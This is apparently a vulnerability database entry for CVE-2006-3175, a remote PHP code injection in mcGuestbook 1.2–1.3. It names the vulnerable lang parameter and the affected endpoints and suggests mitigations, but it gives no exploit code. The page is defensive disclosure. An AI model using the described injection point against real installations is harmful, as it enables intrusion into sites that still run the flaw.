PT-2006-4070 · Mcguestbook · Myco Guestbook

Sweet-Devil

Published

2006-06-23

Updated

2018-10-18

CVE-2006-3175

CVSS v2.0

7.5

High

Vector

AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions mcGuestbook versions 1.2 through 1.3

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the lang parameter to API endpoints such as "admin.php", "ecrire.php", and "lire.php". It is noted that the issue might be limited to a race condition during installation or an improper installation, since a completed installation creates an include file that prevents external control of the lang variable.

Recommendations For mcGuestbook versions 1.2 through 1.3, consider disabling access to the "admin.php", "ecrire.php", and "lire.php" API endpoints until a proper fix is applied, and ensure proper installation to prevent external control of the lang variable.

Exploit

Fix

Code Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-94

Related Identifiers

CVE-2006-3175

Affected Products

Myco Guestbook

PT-2006-4070 · Mcguestbook · Myco Guestbook

CVE-2006-3175

Weakness Enumeration

Related Identifiers

Affected Products

References · 12